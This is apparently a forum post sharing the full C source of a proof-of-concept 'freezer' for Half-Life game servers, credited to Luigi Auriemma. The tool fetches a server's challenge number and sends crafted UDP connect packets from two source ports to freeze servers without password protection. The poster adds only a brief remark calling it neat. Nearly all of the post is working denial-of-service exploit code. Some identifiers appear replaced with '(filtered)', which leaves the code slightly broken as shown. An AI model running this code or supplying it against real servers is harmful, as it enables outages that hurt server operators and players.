I recently stumbled across this code :
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#ifdef WIN
#include <winsock.h>
#include "winerr.h"
#define close closesocket
#define usleep sleep
#else
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <netdb.h>
#endif
#define VER "0.1"
#define BUFFSZ 4096
#define PORT 27015
#define INFO "\xff\xff\xff\xff" \
"infostring\n\0"
#define GETCH "\xff\xff\xff\xff" \
"getchallenge\n\0"
#define CHOFFSET 14 /* Challenge offset "A00000000 " */
#define CRASH 2 /* number of packets for cause the freeze */
#define TIMEOUT 5 /* 5 seconds */
#define (filtered) "\xff\xff\xff\xff" \
"connect %d" \
" %s \"" \
"\\prot\\2" \
"\\unique\\-1" \
"\\raw\\00000000000000000000000000000000" \
"\"fuckyou!"
int getproto(unsigned char *buff);
int pwdonoff(unsigned char *buff);
void timeout(int sock);
void showinfostring(unsigned char *buff, int size);
u_long resolv(char *host);
void std_err(void);
int main(int argc, char *argv[]) {
unsigned char buffrecv[BUFFSZ],
buffsend[sizeof((filtered)) + 16],
challenge[16];
struct sockaddr_in peer,
peerbind;
int sd,
err,
rlen,
chlen,
num,
bufflen,
proto,
on = 1,
pwd;
unsigned short randport;
setbuf(stdout, NULL);
fputs("\n"
"Half-Life (all versions) freezer "VER"\n"
"by Luigi Auriemma\n"
"e-mail: aluigi@pivx.com\n"
"web: http://www.pivx.com/luigi/\n"
"\n", stdout);
if(argc < 2) {
printf("\nUsage: %s <host> [port(%u)]\n", argv[0], PORT);
exit(1);
}
#ifdef WIN
WSADATA wsadata;
WSAStartup(MAKEWORD(2,0), &wsadata);
#endif
srand(time(NULL));
#ifdef WIN
srand(rand()); /* better */
#endif
peer.sin_addr.s_addr = resolv(argv[1]);
if(argc == 3) peer.sin_port = htons(atoi(argv[2]));
else peer.sin_port = htons(PORT);
peer.sin_family = AF_INET;
rlen = sizeof(peer);
peerbind.sin_addr.s_addr = INADDR_ANY;
peerbind.sin_family = AF_INET;
sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
if(sd < 0) std_err();
/* GET INFORMATIONS */
err = sendto(sd, INFO, sizeof(INFO) - 1, 0, (struct sockaddr *)&peer, rlen);
if(err < 0) std_err();
timeout(sd);
err = recvfrom(sd, buffrecv, BUFFSZ, 0, (struct sockaddr *)&peer, &rlen);
if(err < 0) std_err();
buffrecv[err] = 0x00;
proto = getproto(buffrecv); /* protocol version */
pwd = pwdonoff(buffrecv); /* check if password is required */
showinfostring(buffrecv, err);
/* GET CHALLENGE NUMBER */
err = sendto(sd, GETCH, sizeof(GETCH) - 1, 0, (struct sockaddr *)&peer, rlen);
if(err < 0) std_err();
timeout(sd);
err = recvfrom(sd, buffrecv, BUFFSZ, 0, (struct sockaddr *)&peer, &rlen);
if(err < 0) std_err();
close(sd);
chlen = err - CHOFFSET - 4;
strncpy(challenge, buffrecv + CHOFFSET, chlen);
printf("Challenge: %s\n", challenge);
if(pwd == '1') {
fputs("\nError: The server is protected by password. ONLY servers without password are vulnerables!\n", stdout);
exit(1);
}
bufflen = snprintf(buffsend,
sizeof(buffsend),
(filtered),
proto,
challenge);
fputs("\n\nIf the socket goes in timeout, the remote server is down!\n\n", stdout);
#ifdef WIN
randport = rand() + 1; /* 16 (filtered) bits */
#else
randport = (rand() >> 15) + 1; /* yeah, 32 bits */
#endif
printf("\nRandom Port: %hu\n", randport);
for(num = 0; num < CRASH; num++) {
/* we create the socket */
sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
if(sd < 0) std_err();
err = setsockopt(sd, SOL_SOCKET, SO_REUSEADDR, &on, sizeof(on));
if(err < 0) std_err();
/* we send the packets from 2 different source ports */
peerbind.sin_port = randport + num;
err = bind(sd, (struct sockaddr *)&peerbind, rlen);
if(err < 0) std_err();
/* we send the packet */
err = sendto(sd, buffsend, bufflen, 0, (struct sockaddr *)&peer, rlen);
if(err < 0) std_err();
timeout(sd);
err = recvfrom(sd, buffrecv, BUFFSZ, 0, (struct sockaddr *)&peer, &rlen);
if(err < 0) std_err();
printf("Connect: %s\n", buffrecv + 5);
close(sd);
sleep(0);
}
fputs("\nThe server doesn't seems to be vulnerable, sorry\n\n", stdout);
return(0);
}
int getproto(unsigned char *buff) {
int p;
unsigned char *ptr;
ptr = strstr(buff + 23, "protocol");
if(ptr) {
p = atoi(ptr + 9);
} else {
fputs("\nError: No protocol informations in the answer of the server\n", stdout);
exit(1);
}
return(p);
}
int pwdonoff(unsigned char *buff) {
int p;
unsigned char *ptr;
ptr = strstr(buff + 23, "password");
if(ptr) {
p = *(ptr + 9);
} else p = '0';
return(p);
}
void showinfostring(unsigned char *buff, int size) {
int nt = 1,
len;
unsigned char *string;
fputs("\n--------------------------------------------------\n", stdout);
if(*(long *)buff != -1) {
fputs("\nError: Bad answer from the server (it is not a true server)\n", stdout);
exit(1);
}
len = strlen(buff);
if(len < size) buff += len + 1;
while(1) {
string = strchr(buff, '\\');
if(!string) break;
*string = 0x00;
/* \n or \t */
if(!nt) {
printf("%s: ", buff);
nt++;
} else {
printf("%s\n", buff);
nt = 0;
}
buff = string + 1;
}
printf("%s\n", buff);
}
void timeout(int sock) {
struct timeval timeout;
fd_set fd_read;
int err;
timeout.tv_sec = TIMEOUT;
timeout.tv_usec = 0;
FD_ZERO(&fd_read);
FD_SET(sock, &fd_read);
err = select(sock + 1, &fd_read, NULL, NULL, &timeout);
if(err < 0) std_err();
if(err == 0) {
fputs("\nError: Socket timeout, no answers received\n", stdout);
exit(1);
}
}
u_long resolv(char *host) {
struct hostent *hp;
u_long host_ip;
host_ip = inet_addr(host);
if(host_ip == INADDR_NONE) {
hp = gethostbyname(host);
if(!hp) {
printf("\nError: Unable to resolv hostname (%s)\n", host);
exit(1);
} else host_ip = *(u_long *)(hp->h_addr);
}
return(host_ip);
}
#ifndef WIN
void std_err(void) {
perror("\nError");
exit(1);
}
#endif
///
As the author said , ONLY servers that are NOT password protected and that do NOT use WON authentication are vulnerable. But its still neat.
Credits - http://www.pivx.com/luigi/index.htm#poc
